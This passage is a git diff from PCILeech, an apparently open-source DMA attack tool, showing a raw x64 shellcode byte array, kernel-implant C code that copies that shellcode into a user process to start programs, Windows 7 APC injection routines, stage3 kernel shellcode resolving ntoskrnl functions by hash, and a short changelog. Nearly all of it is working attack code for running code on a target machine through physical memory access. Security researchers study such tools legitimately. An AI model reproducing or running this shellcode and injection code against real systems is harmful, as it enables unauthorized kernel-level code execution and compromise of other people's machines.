+ 0x74, 0x78, 0x48, 0x8b, 0xcb, 0xe8, 0xda, 0xfe, 0xff, 0xff, 0x85, 0xc0,
+ 0x74, 0x6c, 0x48, 0x8b, 0x53, 0x78, 0x48, 0x8b, 0x4b, 0x70, 0x48, 0x8b,
+ 0x42, 0x10, 0x48, 0x39, 0x41, 0x08, 0x75, 0x0a, 0xb9, 0x0a, 0x00, 0x00,
+ 0x00, 0xff, 0x53, 0x40, 0xeb, 0x47, 0x44, 0x8b, 0x41, 0x08, 0x48, 0x8d,
+ 0x51, 0x68, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8d, 0x4c, 0x24,
+ 0x40, 0x48, 0x8b, 0x4b, 0x50, 0x25, 0xff, 0x07, 0x00, 0x00, 0x41, 0x81,
+ 0xe0, 0xff, 0x07, 0x00, 0x00, 0x48, 0x03, 0xd0, 0x41, 0x3b, 0xc0, 0x72,
+ 0x06, 0x41, 0xb8, 0x00, 0x08, 0x00, 0x00, 0x44, 0x2b, 0xc0, 0xff, 0x53,
+ 0x48, 0x85, 0xc0, 0x74, 0x15, 0x48, 0x8b, 0x4b, 0x78, 0x8b, 0x44, 0x24,
+ 0x40, 0x48, 0x01, 0x41, 0x10, 0x83, 0xbb, 0x88, 0x00, 0x00, 0x00, 0x00,
+ 0x75, 0x88, 0x48, 0x8b, 0xcb, 0xe8, 0xbe, 0xfc, 0xff, 0xff, 0x48, 0x83,
+ 0xc4, 0x30, 0x5b, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74,
+ 0x24, 0x10, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0x8b, 0xfa, 0x48, 0x8b,
+ 0xd9, 0x48, 0x8b, 0xcf, 0xba, 0xfa, 0x97, 0x02, 0x4c, 0xe8, 0x06, 0xfc,
+ 0xff, 0xff, 0xba, 0x90, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0xb0, 0xff, 0xd0,
+ 0x48, 0x8d, 0x8b, 0xe8, 0x0e, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x89,
+ 0x08, 0x48, 0x8d, 0x50, 0x08, 0x48, 0x8b, 0xcf, 0xe8, 0x83, 0xfd, 0xff,
+ 0xff, 0x48, 0x8b, 0x0e, 0x48, 0x83, 0xb9, 0x08, 0x01, 0x00, 0x00, 0x00,
+ 0x74, 0x7b, 0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x4c, 0x8d, 0x44, 0x24,
+ 0x30, 0xc7, 0x44, 0x24, 0x30, 0x18, 0x00, 0x00, 0x00, 0x48, 0xba, 0x21,
+ 0x95, 0xef, 0xdf, 0x32, 0x12, 0x65, 0x12, 0xbf, 0x01, 0x00, 0x00, 0x00,
+ 0xbb, 0x00, 0x08, 0x00, 0x00, 0x89, 0x7c, 0x24, 0x40, 0x44, 0x8b, 0xcb,
+ 0x48, 0x8b, 0x06, 0x48, 0x8b, 0x88, 0x08, 0x01, 0x00, 0x00, 0x48, 0x89,
+ 0x4e, 0x70, 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x05, 0x00,
+ 0x10, 0x00, 0x00, 0x48, 0x89, 0x46, 0x78, 0x48, 0x89, 0x11, 0x48, 0x8d,
+ 0x4e, 0x68, 0x48, 0x8b, 0x46, 0x78, 0x48, 0x89, 0x10, 0x48, 0x8d, 0x56,
+ 0x50, 0xff, 0x56, 0x10, 0x48, 0x8d, 0x56, 0x60, 0x44, 0x8b, 0xcb, 0x48,
+ 0x8d, 0x4e, 0x58, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0xff, 0x56, 0x10, 0x89,
+ 0xbe, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xce, 0xe8, 0x3f, 0xfc, 0xff,
+ 0xff, 0x85, 0xc0, 0x75, 0x0a, 0x48, 0x8b, 0xce, 0xe8, 0xd7, 0xfb, 0xff,
+ 0xff, 0xeb, 0x45, 0x48, 0x8b, 0x06, 0x48, 0x83, 0xb8, 0x08, 0x01, 0x00,
+ 0x00, 0x00, 0x74, 0x38, 0x48, 0x83, 0x64, 0x24, 0x28, 0x00, 0x4c, 0x8d,
+ 0x05, 0x6b, 0xfe, 0xff, 0xff, 0x83, 0x64, 0x24, 0x20, 0x00, 0x4c, 0x8b,
+ 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20, 0x48, 0x83, 0x64, 0x24,
+ 0x28, 0x00, 0x4c, 0x8d, 0x05, 0x77, 0xfd, 0xff, 0xff, 0x83, 0x64, 0x24,
+ 0x20, 0x00, 0x4c, 0x8b, 0xce, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x20,
+ 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0x74, 0x24, 0x68, 0x48, 0x83,
+ 0xc4, 0x50, 0x5f, 0xc3
};
- unsigned int wx64_exec_user_bin_len = 1539;
+ *ppb = wx64_exec_user_bin; // user data
+ *pcb = sizeof(wx64_exec_user_bin);
+}
+#endif /* ! _EXEC_USER_EXTERNAL */
+
+#ifdef _EXEC_USER_EXTERNAL
+VOID GetUserExecShellcode(_In_ PKMDDATA pk, _Out_ PBYTE *ppb, _Out_ PDWORD pcb)
+{
+ *ppb = pk->ReservedKMD[2]; // user data
+ *pcb = 0x1000 - (pk->ReservedKMD[2] & 0xfff);
+}
+#endif /* _EXEC_USER_EXTERNAL */
+
+//----------------------------------------------------------------------------------------------------------
+// USER MODE CODE SETUP BELOW:
+//----------------------------------------------------------------------------------------------------------
+
+NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCTIONS2 fnk2, PBYTE pb, QWORD qwAddrConsoleBuffer)
+{
+ PBYTE pbCodeUser;
+ DWORD cbCodeUser;
+ GetUserExecShellcode(pk, &pbCodeUser, &cbCodeUser);
+
+ pk->ReservedKMD[4] = 0x7777666677776666;
+ pk->ReservedKMD[5] = pbCodeUser;
+ pk->ReservedKMD[6] = cbCodeUser;
+ pk->ReservedKMD[6] = *(PQWORD)pbCodeUser;
PUSERSHELL_CONFIG pCfg = (PUSERSHELL_CONFIG)(pb + 0x1000 - sizeof(USERSHELL_CONFIG));
SIZE_T cchProcToStart = fnk2->strnlen(pk->dataInStr, MAX_PATH);
@@ -395,7 +407,7 @@ NTSTATUS IntializeUserModeCode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In
return E_INVALIDARG;
}
fnk->RtlZeroMemory(pb, 0x1000);
- fnk->RtlCopyMemory(pb, wx64_exec_user_bin, wx64_exec_user_bin_len);
+ fnk->RtlCopyMemory(pb, pbCodeUser, cbCodeUser);
fnk->RtlCopyMemory(pCfg->szProcToStart, pk->dataInStr, MAX_PATH);
pCfg->fCreateProcess = (DWORD)pk->dataIn[1];
pCfg->qwAddrConsoleBuffer = qwAddrConsoleBuffer;
@@ -444,6 +456,7 @@ QWORD SetupConsoleBufferUserMode(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _
//----------------------------------------------------------------------------------------------------------
// Windows 7 APC ROUTINES BELOW (WORKAROUND FOR MISSING ntoskrnl!RtlCreateUserThread).
//----------------------------------------------------------------------------------------------------------
+#ifdef _WIN7_COMPAT
/*
* The KernelApcRoutine is called after the user mode APC is completed.
@@ -614,6 +627,7 @@ VOID ActionDefault_QueueApcState(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _
fail:
if(pKApc) { fnk->ExFreePool(pKApc); }
}
+#endif /* _WIN7_COMPAT */
//----------------------------------------------------------------------------------------------------------
// MAIN CODE BELOW:
@@ -692,12 +706,15 @@ VOID ActionDefault(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FU
goto fail;
}
CommonSleep(fnk, 250);
- } else {
+ }
+#ifdef _WIN7_COMPAT
+ else {
// Windows 7 fallback to more complicated KeInsertQueueApc method.
ActionDefault_QueueApcState(pk, fnk, fnk2, Process, ApcState, pvAddressUserMode);
}
+#endif /* _WIN7_COMPAT */
fail:
- if(ZwProcessHandle) { fnk2->ZwClose(ZwProcessHandle); }
+ if(ZwProcessHandle) { fnk->ZwClose(ZwProcessHandle); }
if(Process) { fnk2->ObDereferenceObject(Process); }
}
diff --git a/pcileech_shellcode/wx64_stage3_c.c b/pcileech_shellcode/wx64_stage3_c.c
index b7e9310..740481a 100644
--- a/pcileech_shellcode/wx64_stage3_c.c
+++ b/pcileech_shellcode/wx64_stage3_c.c
@@ -1,6 +1,6 @@
// wx64_stage3_c.c : stage3 main shellcode.
//
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
// Author: Ulf Frisk, pcileech@frizk.net
//
#include
@@ -140,30 +140,30 @@ typedef struct tdNTOS {
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
NTOS fn; // [0x300] used by shellcode to store function pointers.
@@ -227,17 +227,22 @@ VOID stage3_c_EntryPoint(PKMDDATA pk)
{
pk->MAGIC = 0x0ff11337711333377;
pk->OperatingSystem = KMDDATA_OPERATING_SYSTEM_WINDOWS;
- pk->fn.ExFreePool = PEGetProcAddressH(pk->AddrKernelBase, H_ExFreePool);
- pk->fn.MmFreeContiguousMemory = PEGetProcAddressH(pk->AddrKernelBase, H_MmFreeContiguousMemory);
- pk->fn.MmAllocateContiguousMemory = PEGetProcAddressH(pk->AddrKernelBase, H_MmAllocateContiguousMemory);
- pk->fn.MmGetPhysicalAddress = PEGetProcAddressH(pk->AddrKernelBase, H_MmGetPhysicalAddress);
- pk->fn.MmGetPhysicalMemoryRanges = PEGetProcAddressH(pk->AddrKernelBase, H_MmGetPhysicalMemoryRanges);
- pk->fn.MmMapIoSpace = PEGetProcAddressH(pk->AddrKernelBase, H_MmMapIoSpace);
- pk->fn.MmUnmapIoSpace = PEGetProcAddressH(pk->AddrKernelBase, H_MmUnmapIoSpace);
- pk->fn.PsCreateSystemThread = PEGetProcAddressH(pk->AddrKernelBase, H_PsCreateSystemThread);
- pk->fn.RtlCopyMemory = PEGetProcAddressH(pk->AddrKernelBase, H_RtlCopyMemory);
- pk->fn.ZwProtectVirtualMemory = PEGetProcAddressH(pk->AddrKernelBase, H_ZwProtectVirtualMemory);
- pk->fn.KeDelayExecutionThread = PEGetProcAddressH(pk->AddrKernelBase, H_KeDelayExecutionThread);
+ DWORD i = 0, NAMES[32];
+ NAMES[i++] = H_ExFreePool;
+ NAMES[i++] = H_MmFreeContiguousMemory;
+ NAMES[i++] = H_MmAllocateContiguousMemory;
+ NAMES[i++] = H_MmGetPhysicalAddress;
+ NAMES[i++] = H_MmGetPhysicalMemoryRanges;
+ NAMES[i++] = H_MmMapIoSpace;
+ NAMES[i++] = H_MmUnmapIoSpace;
+ NAMES[i++] = H_PsCreateSystemThread;
+ NAMES[i++] = H_RtlCopyMemory;
+ NAMES[i++] = H_ZwProtectVirtualMemory;
+ NAMES[i++] = H_KeDelayExecutionThread;
+ while(i) {
+ i--;
+ *((PQWORD)&pk->fn + i) = PEGetProcAddressH(pk->AddrKernelBase, NAMES[i]);
+ }
stage3_c_MainCommandLoop(pk);
}
diff --git a/readme.md b/readme.md
index ad2cb31..d185bad 100644
--- a/readme.md
+++ b/readme.md
@@ -220,3 +220,7 @@ v2.4
v2.5
* SP605/FT601: re-designed and improved. NB! FPGA device have to be re-flashed with new bitstream!
* SP605/TCP: bug fixes.
+
+Latest
+* Display command added.
+* Various bug fixes.